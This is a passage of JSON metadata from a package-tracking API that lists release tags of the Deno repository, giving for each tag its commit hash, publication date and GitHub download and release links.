o/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_a